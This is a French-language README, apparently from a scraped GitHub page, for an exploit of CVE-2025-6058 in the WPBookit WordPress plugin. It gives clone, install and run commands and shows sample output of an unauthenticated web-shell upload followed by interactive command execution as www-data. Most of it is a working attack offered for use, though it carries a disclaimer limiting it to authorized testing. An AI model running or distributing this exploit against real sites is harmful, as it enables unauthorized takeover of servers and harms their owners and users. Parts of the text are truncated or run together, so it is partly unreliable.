
WordPress WPBookit ≤ 1.0.4 Exploit de téléchargement de fichier non authentifié
Exploit de téléchargement arbitraire de fichier non authentifié ciblant le plugin WPBookit pour WordPress (≤ 1.0.4)
L'exploit permet le téléchargement distant d'un shell et l'exécution complète de commandes.
Auteur : 0xgh057r3c0n
CVE-2025-6058 est une vulnérabilité critique affectant le plugin WPBookit sur le CMS WordPress. Un attaquant non authentifié peut abuser d'un point de terminaison AJAX vulnérable pour télécharger des fichiers PHP arbitraires, permettant une .
README.txtghost_shell.php)python3 --version
pip install requests
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
python3 CVE-2025-6058.py -u https://victim.com
[>] Vérification de la version du plugin...
[+] Version du plugin trouvée : 1.0.4
[!] La version cible est vulnérable.
[>] Téléchargement du shell...
[+] Téléchargement réussi.
[+] URL du shell : https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
[!] GhostShell interactif démarré — tapez 'exit' pour quitter.
┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
ghost_shell.php/wp-content/uploads/YYYY/MM/ghost_shell.phphttps://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
Cet exploit est développé à des fins éducatives et pour des tests de pénétration autorisés uniquement. Toute utilisation non autorisée contre des systèmes sans consentement explicite est illégale.
Publié sous licence MIT
Conçu pour l'audit de sécurité WordPress 🛡️ par 0xgh057r3c0n